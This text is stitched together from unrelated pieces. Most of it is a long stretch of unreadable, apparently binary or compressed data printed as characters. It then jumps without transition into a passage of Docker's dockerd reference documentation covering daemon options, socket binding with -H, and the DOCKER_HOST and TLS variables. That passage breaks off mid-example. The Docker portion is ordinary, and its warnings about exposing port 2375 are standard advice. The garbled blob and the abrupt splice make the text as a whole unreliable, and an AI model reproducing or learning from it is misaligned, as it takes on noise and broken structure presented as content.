zY>BQ|CT%aDf@$d;rwOrrFYb`6;GtIFz5X4~Q?efqB)h}yY2WYoY_~sVw^L3j3>MbF zVL(u6M{rL^$cv89?T#?%yAh^$qrC6NltvXA*Lru;aNYG2cN$8& zZ@lPk-0o^Fz1<|;bH}@fV%*cQUD8?F)BBHd`uy|2Cdo1**IdiwjD`q#Y= zecJB-@}YavbilxE;792IBWqyGRO-)*0pL&jjxOaZe(^dDv( zW>CmyaGI}Q?A(Av*`SPCkMzRezwMntoY_$Ko*_jarqa0~)jx?MW<%<|Lt1711exK< zjUl~r!(9HuGB<{e7KSgH4x9HP&16QbvxjU#M(oN)$_z$CAC5Tw8Sz4lIIfS7eMZxW zqXOBZp8TVSvzbSFM;-o*!fIm_r;z}DW}wg5-mtINbT=)9FKZ9e(8qzWv5{yo%?4H_e*+_ zg$v`w{G-m=_mOw**Onox7RGBrM)BJBzZ`zhXm&$>cODwv(C=3q9p@jLydln7AD&?EJ1_l+e(q61?jz6M zW@7E5X8y?%ncaqplj9+i55A5S1At7{WXZzhXPFUK7R+(vSQ9zH6WE-MFk>PfXglmI zJl-yQZ14hp$p2W-=kd=QkGB^d@5r!>wOHmYk4Z$Br=0cD`<5})z9pdnMdke0Oeh|i zR(1e1dcexVb^;SksPX~8u|b1=YkNyuxu;pF{7FZ!{8K4#UiG%agG#B>-Fm?_-L-)6 z`+X|sjiqt77fq%_&%=?UurrmFHKmcY|LN%h`1tF`KQlXjcY~n{(;bcgiruU!Rb%yc 
zI%NWe-b0FE4H@tE?ftv+gn+TX_5dNc=jrJKPqV5VyiPx!OL~0tG=ky`>HqaGeRR$F zBed;xpORILFj4*4)$oW`tN-GGDOX#{bEovoC;A5}45)P><=qYp%{`X2rO#*7fLn$W zCkGHW)iAR~j&;bbQu`NotSN}LsLBKHOW$6fS9%8D55E@gIBRP1ylz)#>&ZgLkJSTt zFCvw98HCk1>@^~=O1gL9J{ecM`Q1SFzP3L9(n1)K*}L$~9`2d}K4bz~de4XcCXO6= z*;n1bS)Z(yS8((cpQ{=~k0X>!I_#J)juQyVEs|@_m$&c>6@&H^_NSYkF$O(?!iJ2!^$EcozOSdYzZ`RjV}aYL<0|)qt%GPsGrQ&ZY9N`LJkalQQ|wK4Cj>z zp3d3fl`nrF&R5 zwK!N7mZgMswILMKt=WNSG1yC{d;JOy2-lxMZI#bQRPR}J?#<>2d zqyIW)Wt4hZxv-LdaDAUkl z1)%837I|ZZmB5Pw9&CcpC_x? zh|}MnliAzM&(bf>U?$JVyi)k*7SV0a#$v;MgbbSHQPsI_zp&P>NDAATua?}z@ZAwa z0>s0H8m^MnwIU5ikD8wO?Cq8l8piLLclDWW3)}R1FY*fpzY58Rod1{OLR1$ zu_<^onUtldTv}dPWo?jBgd&?WQV39HSp~VMY7Xs0e^@*=J3lx)O1?VBCSOl+2AsPa zCGu8u&S4GhGLTYh7Ja_40w-F6JYs555P;tA8d5u66;zJP;O4Wz zJo_w{uM9~sBdZt+=KCRy{{OACm6Qz26-My^6BU?4^;Z-f3&@95rw^vf@d7Wi(I(w( zyQ@SvhzZ@R4fC|tGb=_^w8rvrEw|&S{n-vWD3%qWlKy_m3c(K{TfSmx_5z?{EpH?e zOFhz?z$*z5t7%l^dJcuPl1NmvOWXO{*0VC`v(T056Xd*tpp;J=}QAxzz)fqm~!=LY)ToA4PsQ(vpQMDGCUa?H|{)owzu2} zm62K->z|z5so>{KFtU1Jbeg1;8N`gMMT@Y|0YHW#g-S&`vk)m4Tr$522y!3EYUW_#9_btO9Az%ajVzg?o-q&7Usjx1Tu@cRibjrqB5%$^VNkS zd?FlhQmgW=5|rAE3$`Y2YX>E_l+IJw6X%elRkVi z?hTvwMzTlLNci>hZ6M!It)UNB--|>zre${?MnXw?;4Zq}0m^j6+=(W2LQb5cFxq(< zV73pY{|veFM58SjFRQneox-xjtE*Pi$stXb#!NNoq@ou$dXhabAucR(Pr8EjlC{-P zb@I=}E7kf@XYdjdlvXMrL3!4S^%tVyf#i)VcV!Ud3O|JO@R_$=?+#uhwDq zM4B0o*yiCaES$nM{RI}RA9$CXRpYMl3_B?#7Cv;0p47Xy5$}w|Os5m?(W6UZXRVWg z=w~;6EsGoY0$sY;4S79oNp?Lu%7z>_H|CqS!Rzd&;kNYhqf-n!$;!b*(co{`-NON@vYphk<{DQbk^A8rHTPNkJrLvRw zb|f@4zmPX5R(5JIU+>0rOnx%3%14!Uw#KxWy#6*@`2-7x?R7`?v~EOUgiU$2k%>YJ zD?2%{efu8qW-H3Y+_-f<$sXdBe^UFED_@n5m^$FtFkz0m5x_}>le6}bk%Q>SPAka+I4(6N(W8i*xW=+cH=4oY z*YQB^CH2&eD&P2X4C-Othe`$*=AU)DF`Z?^MXb>kjp-WdqAwGtTqGynC!r?RfdMqv zMLAUX$_42q0uN`^Z*ismXA;{d}GRnmyHwySgbHUeq}9U%!{OY4{qqz4^b4k{)Z)nBo( zBF;RD=+>2B8Ix3AIXw0f0!WepL|WtQQR)<09SAOW3MenhMQW0<*8x>4A>U& zwO7Ji7|mbUYs9bFYY!`c=J1y;HMqKBbkH4;mU`!ec~}ADVSh!T!7f5>FCjIZ2tgj3 
z#X65pKKfH7Dn|6UCgBM21to!=@jBdUU(haz-6aaORDp1<4f?IvCEYZS5p`maj_cS$SC$F9+RS}pX2iJ(S`AbAN<`|hhCT* zv~t}TJd@}d5!Unm;u4waz)OO&GSH#>uMMZZqx*lKpT#?R( z1hvwEkbyi2VkjwB?6=cA&lNXsSbtc;ioD_NCi#^yc(R@s} z<1L6f#f4C2kT5qU9^+VS*wbx;dVYf)vGsF=Fqx^hV;Dx0*kBZ%2pPi0VUmPHfI@X^ zApK;^D}L#&t9Gn$ZjlyQGgSbg7?y~(b=s!{4{~cX2wk}?Pv!cF?bCS~&VOfN<%R@X z1J9^xPN&2Fp0Dsa;Anyo%zGFL16+CY<%$EvUrX-y&FhlDTeHWwe+9|{`WUi}Y)PLFHumC@s~Z%ITNeaq3Y1vFQe5;1H#mj-(mTI@uU z_dJvP_G&rbAv#T%V^ZK;S><&;TEd)9Y()y`+GX|$qUnor2c)Hd+Q&o`Tk`1%Pa@(* zJ1B@z;L=Es=0D+l%KNp+tTrePYhEI-v6kRWkG|_YhtT{rD4es=i(xE1 z&jFeSK0;D@TT_oFOroQW3k(>q!JzHMrqe|_Nc*0TxP_l&f@4}p(S^Wuv??mX^O z3EPQX{P6E5dE@V5ir~5D!aJYtX(Sa3{rUe@d63lKP07C-R(6k?7H)v!c_M+CNjS z9ZdBKPh}N~{z*%%daDX-q*m}KO#x{$foZm)33*pxyZ`6fdvVD;#V9?|9=4;y^whLV zvuPJ4(vuFQrxhVG)(}~9>6hnXI5Vt22Enpnfv{bOWL)O8xQND7aM2)KG%$(&E3i@` zbKN$Ro08d3loeZ>89SA!O$@gNvK|+})h7aHJF>>cGL?Z-d^LMW%o9!&$A)k48`7nQ z8F)$}kXD4~>^Kz;8zL#0fvKSUlataCS;02hNZ;&DTj2hj+6$C*{7!j7(qa zbmb|g^Tpetz3c_&Pn^}s6@3Sa6V8Y-a%CJ`=MEh69+NE@hTN61=lzZwFd{OhXn3?ONV{;+K-;FwU-x5X`g|WPDrmGKPqmJzoJ(l z>Rx~sgAWl3ye0GA98e1Mvf#)Zx(l?2hx|O+eUY|D+m0hNd9O-+xf(uyly~at=YYc3 zqTYB$;rt97=5Q3-qDtd+yZ2q@L`>1;`-P2FMSre{Uiw{dS+v+F2*`J^wPQj?4Z0go z5BDD^8T8*Np3^C*yYFLrwWOr0ME|u%s3;_p7|!uF7GL+ck%8|h*6x(dEo?9CD~2#} z#cHjGuDuIMAIpn~6}w^;B*hNs2PvMJ;8O$^)&xjWmr$Fzfw9Ln#o%h$C@OJ44g zhbjzm5o!_A-h~L~8DKV`q8+FNaFvJbDmTI_jeHSzu+V+pD2+N%|Mbe6I0oLGVG+wX z=qIa|=UVYg1kJ8M1)K1+c z!@A$bc)GF%5L{74O}=oi?skj$yKh30;irNgs7fwDp>2C5GUc>etX!!+wQO%r2g^K9O$Yrpy9Z`Yc~%5O0m+QI_C%+s^-;;q`!37LLP8@jzSw(cuArt-i_3XLjq z8l`2x8Qq%EvD_@@m3KyctKb#SC~G>OMQd$cn7F-(Oly*Gj+R!3i2~sXtPDtGF@=gx zddvr-Vy#W?I|6#kDYy5ZX1F0=WH#~nUiBT7nnCe#szIXP9+BTPhBkJbRNsne4kODL zf)q<3PkEFvMZlbLFc(l-$H?v{<*c_E=3o@>VMU{AFhkM2h9FuXGxfJ4egvz=wGYX| zhrLEob)ZVC+2?u6X+Px4{1k^y? 
zc9L5=Zn!OvVR4!dKt%2fR_yo;GS;ZPLkjI4+k)rL;!m2!MH%rO59d|Bhjb;0mu;Av zlg+oNHK~{!&ky|l-_7emB{eafR4r=qhA>H6M45yb(cU@Lm@jmo3Q58lNwXsq^E;hY z&P93R2mQJpN9bphPzt`tyIFUqG2T9d`>%U@VM&;R6~R#OZZalk>=d@ZhA5R=dYg|= zy-R9Q+h*JN=ywyDPhV8N`656r^E*pI&b3HSjxyl|E(;_3&qnFxl)Rju^k*xWb6ndz zlOD(=u~_2xZ4|1wYQ9w1i7D5)-D@eV#pi_Vn?UmX(cw8KG_(&nnV58)Hqg*=tSDT( zM0?lcX{NJ??{DvbJd)(qTw%l?R83s*K56U2nWCdi`AZyOA5*P}BIdfO*cs3+wKi<~ z-G-89G*TrfCnTRr#x6A~9FeZmAIy||K4d(&Bg6YpH?~v0_mryGLtKj0sAvdE&rR8} zR}N)K6r7edT@YE;9!sO(4u%Mm|Dd#q=+k&r=OqojFEGnjM*oYEM|JQQ%P`KI|A+jp z8^MEuK1j1LLl)i0*#k+HSBV-NOKT%UyWw4W_i5)=MXKFwWY)tTgSUNwB%kpt`gj(T zbEZ5HajH}HCA7LpxK=9_2`SQ?#v$CUkaNnX6NMTd;}sO^8oc}!}|JHVW%*? z6uMr~4b-0}*eCp45L?oj4ZgwK7VZ-?LEO@OIOcXmV3j;&Gzi1w`k7)D-(Hkqg7%dI zDp_Gu*KUkvQKfXxYp?r0$-*EChsJh4ao7|2gqwv8G1ECcIIYo#a%BJ(hlF30$%{c; zvUITuE3C6+n1(N62HPd_TKT2lm=o4Xk=-jwlg<;?yUHA^wlbMHJQnjr;7B81jCzd&5s+Ztufthp;YM#* ziSStyi6}0bFlgR#kRZGRiym*EEVUA`vg#RzP7F?W<{s*2Srjg-ZZSy8gCrej?$-wV zqP@ZT(0rkKZt^bv>(1>5gw0>;c6%Hi6|yG1|2eey1m;*|-?=y3zw{#Z#@>amCkBu3 z*-?O#0mAtsNOLhnYw5_@8M{=fs8_45^~Nb?uBj-XV){g*;e>!4tLUn&c*u%v?#8v4 zryXJs?GuwLxLFIj;SQXRgI1%(H|K@V?R_=ti!|FPf5OM*5nv;+e^AZZzAQmVo6J@O zZLF<{xwZBH=~a2~av{rlTk;7eBnT6VybI6tczEB^Q|w(48pzw9$IW+Vc%OKo)9LV< zCmuJm=&!dDY)QnOvcPxg&8&=%ECY&v> zzG*9BL3AiMwAh)wMgZQ~jlmq$wP^~rGfhi3iIS|)RwKWg;eDUg3f2fj)%_D|_=NiR z+tUOUbi7^S&&jn8tq;oN4;N!TY)j7HzeA%l)h2v7^T`KF|3b*Rnl&8T@8g;mmXY3Yryg#Ma+nl@cK0YqsjITP!52 zP1$o?PnhpE3zp8odo48C?^yXM#y zHf?LUW2=4a(%TNxTa{4jWz{=!TX!#qxUC|3&P3%uM(lcfifOQ&j*HkGxXl+EVf27c zly$n9J5)pbcdzEL`GLO!9pIvC*j=NDB z>iQ!4KQ&~@%WvNozWczbA!B~r{8pF$eTUOS*8FvQ^Y1?hB@=X+LZosFtNw{Su7j3R4(nTairqR=l3arvA1e_FCYp(^c1$RhuisI9mww7+%p!5=OC|+5#AH| zx(B&#{Kl?MGPKVdn3~)<`MAtgS@mYOzWlRezCE6Q71KV-VC5GkHv>A_X8M!TzJLr) z4ViiJp1hmAx2do1ap@gHpX>g<56_Sm+zH=>!a{705(ZNNM;;=>n_CYH%DZ>wgl&p9iqEXi}r1QO4S1|1wsmXXgJ z3Mb42CdC*;1WMZw)y9Uj^$k0+Hmq9zH!+fH(V%}PYYy2r34mVywDx3oz{(Kb) z*eeGdcAg7^xY5@CrL;Zyrr?mH@zJY3G4GD&OO#Qpk`Er|0b=)MiY8y;RNxFEl|~3} 
z%c7p0d|MtjMxY_%f4qBJsg%tG5u>Lu@PQ9qg-V_d93~CcRa+XV&G!ucj~$`$U42>1 zd&0GS4*?L6Q1pEw?5q_I?_f!H-X{r~ZP16~j7PSDn@E^&SlGF@v%y6V*}@d46g#!v zIUF7A%!HJEjogP&Y|J@)prxk@5MV-fY=BG{7!$7BcH3T5=%|%~2nyv6u*~ z6SH(e*aR$rCf5oj4IhyKv2k=7+B~R_ zgN@J8X*)dFg@ZDXbS-^2)4S9P0qCTi{dL^Jp7pVn`hJoJW z;JOh;+eX)7Onwc9FsZ)*>s^SbRg_#Z!xFi%_~(S1v=ICVz>`IGqNd~};vOK6_RI){ zl4*{TzTCKE(vng;$7)JRE`+L3fz%-fUJ}>J?HO)U`|Co@0P^P+i1MT)@3;&C0AH;Q z#*)L$bg~nijcI&8tf-iVGqmhxyzqYp_B96Unf)tW%-V9KK`RCFc@rmADcOJspvuBQr|M2M~bM6z|#u zrS$?pbr%DH?vWXYJ0MFTnQEp?toF(YgEo_i#ko#g+CPj&Kb0iAMotlFHA2wHtH%G6FAvm=Yp#oJrik0S)t}|2hUX5s4P6oi_ za4r=lzE1DK)BzKYV4+AJMZZVDT2sUvTK02QNEG1$f)F|#s-)_K(-YF5YX2Gv<{;nO-4Sic?+zN-B@dt{@$a>jMG( z?~=J{pYryGEE(BkO!Tm<+?iBpEbG=T)*MI){=+H6} zg`-;N`y(I~prqjC$nm`eWaVu2)WnbLwW^1c95Q~C8kruiKMH`3B<9^1vun{GjjyMf zfV@07fIpZu_Cytd#aA>UkwF%!rzajCbqnhd23zKxBoB&m z9c~G>jl%6ZMY~tpxD%=_XtG2Xz}>NF-kn~+I^x&|^tsq`c-~VkQO%MM3LB3*d=K$d z{v`=SehRf2odANTjYOCCd{rsoIQx#=m^QPw7Lf9=5K|oD(ZIbI4k5mG3p|X;@A!r< zVV|_rs+tkd9l`n$5ejuBhADB;*Let;5b4>&Tw-MX7_XnQ3=tU7p~ZzY(9AmSPP$Ov zki-E1vqs?(Z^?)4PXz(M^tgP{a_g18b-FAt-mV7lhi!n8PMOc2js2*7_-=hS5_o=8 zKuh&k3`$-Fhja}~gtGHtc>FOp_pk4?2Tq*0IOQplK@zUeOUIIwEB|qKGKC50=#?~# zEE$X6DZxPeoocT^IiqnKm&`k$wD3^Bh(NCqAW=4rOjf0Gs{n~+(>}05k#?{q`H+PD z1Ei3O06g-+1rSMaQ$-R>J+%NV8}l~hW&C61?@5BVXKq?WFHf2lf3wRF=i&XuM0HGF z*R1rjmf=Z((s@(3Ly#y5qOiz@XS%YH<8-NMau>HR;1|l|>CdEEyfsJmh;zv5U!Az3 zmc)!rj=cd#6cnwb^M&$4w_OflDY-nY$I93tD^hPgZ0H|5_0G z{hz&8i39S*qgx=7TKJO-yr5F_N>l>Jo^Y3AZasPUu~v(D$xgfTO`ar54FGn3fgji) zjWGyyC{Az4JV{SeXC(R(~Vhs_%tDqDtW0!St&KNyqGKd|AOADz}%Er??K3UYs3idT{1GdmRe9!(vY6cTrF%NB(q zdes1OfAO6Acw&Q?9+qe(i@{r}AaknqbA}MxBqZOmrUK6n5MY^>6qd##1mE;bN#4M7 zWAITDc+S@Yq^14&NqU@720+eephHitr8c~!oi55u_?BA3se`gdnJ$BSZ_B+OhVb-V z+!RHPu;7d7vA67H`VoKw64$f5;;S5C_Z^oHPf6Ug_EYA=jbq_jf^I*z}>#m3PO;vmK<3JsonZ{%tI_Tr}R$ow`!LSYc7VyHl~7NpV0)I1&}aZ0w% z5c%_K+^ry_Z#?obG6g0oiIOu_ypp01W~N}^Xa|&~al!%K!h^*Hsm26v0?LjEe0hs> zWrNZbV;()E8nciVc2!V0!vXKD5a)gue0`wPp#Q7=>8hA&z9p%b%m{4e4Q@C7H 
z3DqjRV_e_BKP#5J1OW@bt1~e*Wz&HrZ9wl`g8MVV=^u{#2?W!Yn##7iQJdQ9L>SA` z)NmAc($d6IDxDILxD12|B}io>O5Vn8fF~f_hF}jMRJ0H$3a*_E_B_yNMO<}J*7wy1 zb^>%A3043?fgEV6B`aY=Frn0Byt#HR_z3;ErIjO}F-1#}Tor}CpzL13*&zsG$}n$i zq!^&Q7QkrN40+@EUjG2da#3YKn06qq8eFS|yQL28{tm)KJL{j$;kyrbJayrsduv#8 za>Nc?bUPxahpGjk^PM9?fhDzoTW_0sGF_e=zNu4irh|geiHJ*BLKsv7^#>a>$>3-z z;j#|FNI`e)wqwijqaR0r6Hg)dFub;M>k8CzO$07-b`OPUQ)@vc!5_bRVQV`Iapr?> zJANH-jlUBRwT}=p;rQBwU_?1s`@P$SyEEUi$JMj5_)Citk@1PET|AZ0w(WeS=h!iMD$Mby%7)2t6CnZK?p)5H8&5dXb3DFwC-7YA?WQJp&l^V!(`I>(-5u{c z7gKwR@)`!B4);ws@H!H7DDaz!&ePrmC0zVHhPC9h{nMIC>D;||h5>_@IkU}a1O!Ut z56dv40cw*j`?N%=!`(aG*@p?cF;?nC2g%+ekRy0vq!VuzTJ90*0zf&d9FiZ{#l4Rc zr8XsU9tU_I%hpN@R(huNEEtNP8FXnGY>ytkd5{3N)Q)e!=5%Pl3b-*KxpvLj6^E%;xUG=2X)_@@ew!RB2iA1{}jMi!I7Qr0|PO;OaM7ykxg_$7`0HAvo8DLn4aqQ1?__Hx zylC6PsT*_h4`N3^_hH!;zu3(*4P}N#y~8OzBBIvzvH|Of9tMH;S68O0OH)CeBRbE0 zftY(N)H@BlI={j+lYmY-I@63A)U(r4*Q3nX-&FU_05o}JUx#Zs=*Y4+^NLcv)^Na64ihOvvsJXPbQO>u#>($)eSKpjp{y6`t zr~K8H`uv}luVVhb0%WHlbM`YIHh0A+hoGJ5Ve>b42>fGzl3Eh#uNOJGq?xcJQBf+@ zzjR=JN%qqvoa}P2(X!%&1f>hh%&W_)&HieO%TwQ%wVFM2%wJD=yf)As1fPF0YW6v=01Z%R#$F%HI4emuKNw zNBbAY&G!0FvQ7PDs^V9-oE1mG>5vPH{?F&aE7)9LGNJ|8g4OBqvJRZ|QQX(vH1nOc z9T*-_=)I7mb~Qw>!cD(VPkvgL!~uThAEmVm=Ffec6aba(f7Ic`*10}S=D^O@pS1Dj z|FS=I9^Gd%`AHTFz7pV=Dzd+62=P^){WbaC|H<0+CyXMcbDV}yVShgN6w+j#)x||M zH(4%tS}I#xDln~ju35@^5RkXdnj~))=^*w{Esb!Ssgb}-qYddqV77Ee&7Kj;v8Zgq z`{jtB`-6Rk!7gLDLw*4P0r@dMtICcB$ec%g)j3As4Dc`JALAv~m>iQK{LxpU7pvaF z3RagrfI#gDx6(@#nMLN6~XAFw?bM2Eg)LI>B#CvQ5F@c zXXP~!1@+>^`jq1OlY&z^#Z$uEwzlu1liC8lr!1ny(xO@w7wKl?)vut|m${^PH7WS_0u z3J5|@gM@{KhlKz

hX^kC2g)la!T~mzbHFo1C4VpP-?lqok##r91$LtE>yEgg*cx zMgR*+PD2C&MuQqiPD=nShd>7aD1*Vsg*wIn8iytT1h=k*u_A;k001zAAKin}BZkGt zgDWP3v=prFhl;22^Yr!h_xSnx`~01$?*N@Zcr_>%iW>mb4VsbA$%-4vgsm!&AmTDZ zMqJ@I)B->afdrix95jT%3jz(DSR-T%5ye3TE{K?UfI&cj@%ri9|H-qb&!0epq6&HQ zkcN;rJnoRV4nT&IHKNJ@@Sz4TLm~oLTqPuBAtdLH7E1cjNr8_@7y$Soa6ln&g0N~; z0svysn>mH*-OIPH-@kwx{kw|@1%M%h7!INJA<>5&1tLcVAfUiTLoF6;ojB~!0EmVW zFFfpI>5`@;oPYpu)rsNOgfas=M;Pa#z_@ek-p#xBqrtTc(egHEgk~oc4iFj=&Jfc> z5ELp~r6hppLOTZB8cxXgppLB>K;Qxb8S*FJZTaP>V#bSO{&-ylr=AOHXm zlyK1x7XVNI45z&yfB+w$P+%_r3?RY?0TL4AkVWEXx6hEPhglJThMEbX zo0e+osi?*`pQx<1>MEe5rYh^Kw4S=^tGMQ>>u#~u>g%t-x^wHU#1?C8PrU}K?6S2E zd+f8&Mr%s4%vNhHpUz6F?Y7)jLhZHSh8s|}-Ii;v|F++XtM0mlkbCaC@amc_yYzzV zZoK&B`{}&y2%*Ad4%OHputTWuB`ZtZkeYx71Ej+U09$*nz7$uiBfqOG*qlnoIS9e8 zMu@QSDlm@bbcJ*wZq^2wZB3VLc3{-vpo0@Lpg`#kD4>v( z)J8~M(lslfz+ypp1AM~@-Yn6=3S9q?H;cn50fXCxDDi>`HDvws434YNS`AWry&Mc9 zaG1d}FI=Sq&WSpK#Nsm`w!@Y$*tN>bXU8u4|2@4bag+uch%f*(;(V}#5d)?CLI4Ol zp@Is8n4pf(g30t8rq zTM-i1rV~aKFw7D#08qjXw|p=I5E&SNAe69x(`djvKybhSWF#!5&F+B^yoV0}P&!0F zX%Gm3NK#JYg#1Yj0>xv1Xll?NCuG1TFc1I-nF9?ImT&g9Xz9gQ+!8Pj-bU#S~3(sV}%WCI1DZ=CzD4+(2&}NCnh~{5FA*G3kl&y z`INGTd4#1ySaTlqxo!ji*juJHh652q4w2!Yi|Y!3O950UlI~#0C6~#}OhkZ<7W5%4 zh5>*Nm2nVf90UaR2E;??q7b23AOg({s6Zj%0{Fd7ni5F>01S1_P&z>g#dCr}uVbDnmFWWT(||!+Inl(( zQkFH4P%msr2nw81p5Z700O+J4|6mfwWbQFSg&@$Ley(BwE*Pjz1=@s_t|Ay5_!;sT zl7T@OMg)n2{Kp^_*qCv4B zjuHmIA`rCD3FOIRS0J#29e{5MOQ1_*fB+*I(Z~rUxQuL^AhID0A)bXWUlVr9SZ0!d ziiB8#$Ov!)BUEVtY*9e~fVcuNu_&7qAYUO;NEw!vrT`?jS!d`LYW%JimFlPG>BaXVe$)KLwM12 z`NiuhN+19xnD@Y0qyYd9#wQAZpk5Fr%u;B8;0i}@0|T%WVM@@T1aK(AAZEo72CxAO zn|O9lXg~opTomSV;FTecF-Z#0fG3>z#%F6n0|>xi8T*(|c5T37aZKc`LU9N zV;BtBxX4gunhON*+9g{#AT=OsPNU4_r6pkl=QDw5uS{mRn!o@6*gz7x%;u#X;RI-& zh5-&h=Q`W@&UntVp7+e>KKuF4fDW{s4S*5=7~lkyY_p=hoP!v+fCZ3_w4^6Z=}KGr z(wNS)rZ>&$PD|PaCNaptnioy#Qk(kJs7|%2SIz2HyZY6zj - -# daemon - -```markdown -Usage: dockerd [OPTIONS] - -A self-sufficient runtime for containers. 
- -Options: - --add-runtime value Register an additional OCI compatible runtime (default []) - --api-cors-header string Set CORS headers in the Engine API - --authorization-plugin value Authorization plugins to load (default []) - --bip string Specify network bridge IP - -b, --bridge string Attach containers to a network bridge - --cgroup-parent string Set parent cgroup for all containers - --cluster-advertise string Address or interface name to advertise - --cluster-store string URL of the distributed storage backend - --cluster-store-opt value Set cluster store options (default map[]) - --config-file string Daemon configuration file (default "/etc/docker/daemon.json") - --containerd string Path to containerd socket - -D, --debug Enable debug mode - --default-gateway value Container default gateway IPv4 address - --default-gateway-v6 value Container default gateway IPv6 address - --default-runtime string Default OCI runtime for containers (default "runc") - --default-ulimit value Default ulimits for containers (default []) - --disable-legacy-registry Disable contacting legacy registries - --dns value DNS server to use (default []) - --dns-opt value DNS options to use (default []) - --dns-search value DNS search domains to use (default []) - --exec-opt value Runtime execution options (default []) - --exec-root string Root directory for execution state files (default "/var/run/docker") - --experimental Enable experimental features - --fixed-cidr string IPv4 subnet for fixed IPs - --fixed-cidr-v6 string IPv6 subnet for fixed IPs - -g, --graph string Root of the Docker runtime (default "/var/lib/docker") - -G, --group string Group for the unix socket (default "docker") - --help Print usage - -H, --host value Daemon socket(s) to connect to (default []) - --icc Enable inter-container communication (default true) - --init Run an init in the container to forward signals and reap processes - --init-path string Path to the docker-init binary - --insecure-registry value 
Enable insecure registry communication (default []) - --ip value Default IP when binding container ports (default 0.0.0.0) - --ip-forward Enable net.ipv4.ip_forward (default true) - --ip-masq Enable IP masquerading (default true) - --iptables Enable addition of iptables rules (default true) - --ipv6 Enable IPv6 networking - --label value Set key=value labels to the daemon (default []) - --live-restore Enable live restore of docker when containers are still running (Linux only) - --log-driver string Default driver for container logs (default "json-file") - -l, --log-level string Set the logging level ("debug", "info", "warn", "error", "fatal") (default "info") - --log-opt value Default log driver options for containers (default map[]) - --max-concurrent-downloads int Set the max concurrent downloads for each pull (default 3) - --max-concurrent-uploads int Set the max concurrent uploads for each push (default 5) - --metrics-addr string Set address and port to serve the metrics api (default "") - --mtu int Set the containers network MTU - --oom-score-adjust int Set the oom_score_adj for the daemon (default -500) - -p, --pidfile string Path to use for daemon PID file (default "/var/run/docker.pid") - --raw-logs Full timestamps without ANSI coloring - --registry-mirror value Preferred Docker registry mirror (default []) - --seccomp-profile value Path to seccomp profile - --selinux-enabled Enable selinux support - --shutdown-timeout=15 Set the shutdown timeout value in seconds - -s, --storage-driver string Storage driver to use - --storage-opt value Storage driver options (default []) - --swarm-default-advertise-addr string Set default address or interface for swarm advertised address - --tls Use TLS; implied by --tlsverify - --tlscacert string Trust certs signed only by this CA (default "/root/.docker/ca.pem") - --tlscert string Path to TLS certificate file (default "/root/.docker/cert.pem") - --tlskey string Path to TLS key file (default "/root/.docker/key.pem") - 
--tlsverify Use TLS and verify the remote - --userland-proxy Use userland proxy for loopback traffic (default true) - --userland-proxy-path string Path to the userland proxy binary - --userns-remap string User/Group setting for user namespaces - -v, --version Print version information and quit -``` - -Options with [] may be specified multiple times. - -dockerd is the persistent process that manages containers. Docker -uses different binaries for the daemon and client. To run the daemon you -type `dockerd`. - -To run the daemon with debug output, use `dockerd -D`. - -## Daemon socket option - -The Docker daemon can listen for [Docker Engine API](../api/) -requests via three different types of Socket: `unix`, `tcp`, and `fd`. - -By default, a `unix` domain socket (or IPC socket) is created at -`/var/run/docker.sock`, requiring either `root` permission, or `docker` group -membership. - -If you need to access the Docker daemon remotely, you need to enable the `tcp` -Socket. Beware that the default setup provides un-encrypted and -un-authenticated direct access to the Docker daemon - and should be secured -either using the [built in HTTPS encrypted socket](https://docs.docker.com/engine/security/https/), or by -putting a secure web proxy in front of it. You can listen on port `2375` on all -network interfaces with `-H tcp://0.0.0.0:2375`, or on a particular network -interface using its IP address: `-H tcp://192.168.59.103:2375`. It is -conventional to use port `2375` for un-encrypted, and port `2376` for encrypted -communication with the daemon. - -> **Note:** -> If you're using an HTTPS encrypted socket, keep in mind that only -> TLS1.0 and greater are supported. Protocols SSLv3 and under are not -> supported anymore for security reasons. - -On Systemd based systems, you can communicate with the daemon via -[Systemd socket activation](http://0pointer.de/blog/projects/socket-activation.html), -use `dockerd -H fd://`. 
Using `fd://` will work perfectly for most setups but -you can also specify individual sockets: `dockerd -H fd://3`. If the -specified socket activated files aren't found, then Docker will exit. You can -find examples of using Systemd socket activation with Docker and Systemd in the -[Docker source tree](https://github.com/docker/docker/tree/master/contrib/init/systemd/). - -You can configure the Docker daemon to listen to multiple sockets at the same -time using multiple `-H` options: - -```bash -# listen using the default unix socket, and on 2 specific IP addresses on this host. -$ sudo dockerd -H unix:///var/run/docker.sock -H tcp://192.168.59.106 -H tcp://10.10.10.2 -``` - -The Docker client will honor the `DOCKER_HOST` environment variable to set the -`-H` flag for the client. - -```bash -$ docker -H tcp://0.0.0.0:2375 ps -# or -$ export DOCKER_HOST="tcp://0.0.0.0:2375" -$ docker ps -# both are equal -``` - -Setting the `DOCKER_TLS_VERIFY` environment variable to any value other than -the empty string is equivalent to setting the `--tlsverify` flag. The following -are equivalent: - -```bash -$ docker --tlsverify ps -# or -$ export DOCKER_TLS_VERIFY=1 -$ docker ps -``` - -The Docker client will honor the `HTTP_PROXY`, `HTTPS_PROXY`, and `NO_PROXY` -environment variables (or the lowercase versions thereof). `HTTPS_PROXY` takes -precedence over `HTTP_PROXY`. - -### Bind Docker to another host/port or a Unix socket - -> **Warning**: -> Changing the default `docker` daemon binding to a -> TCP port or Unix *docker* user group will increase your security risks -> by allowing non-root users to gain *root* access on the host. Make sure -> you control access to `docker`. If you are binding -> to a TCP port, anyone with access to that port has full Docker access; -> so it is not advisable on an open network. - -With `-H` it is possible to make the Docker daemon to listen on a -specific IP and port. 
By default, it will listen on -`unix:///var/run/docker.sock` to allow only local connections by the -*root* user. You *could* set it to `0.0.0.0:2375` or a specific host IP -to give access to everybody, but that is **not recommended** because -then it is trivial for someone to gain root access to the host where the -daemon is running. - -Similarly, the Docker client can use `-H` to connect to a custom port. -The Docker client will default to connecting to `unix:///var/run/docker.sock` -on Linux, and `tcp://127.0.0.1:2376` on Windows. - -`-H` accepts host and port assignment in the following format: - - tcp://[host]:[port][path] or unix://path - -For example: - -- `tcp://` -> TCP connection to `127.0.0.1` on either port `2376` when TLS encryption - is on, or port `2375` when communication is in plain text. -- `tcp://host:2375` -> TCP connection on - host:2375 -- `tcp://host:2375/path` -> TCP connection on - host:2375 and prepend path to all requests -- `unix://path/to/socket` -> Unix socket located - at `path/to/socket` - -`-H`, when empty, will default to the same value as -when no `-H` was passed in. - -`-H` also accepts short form for TCP bindings: `host:` or `host:port` or `:port` - -Run Docker in daemon mode: - -```bash -$ sudo /dockerd -H 0.0.0.0:5555 & -``` - -Download an `ubuntu` image: - -```bash -$ docker -H :5555 pull ubuntu -``` - -You can use multiple `-H`, for example, if you want to listen on both -TCP and a Unix socket - -```bash -# Run docker 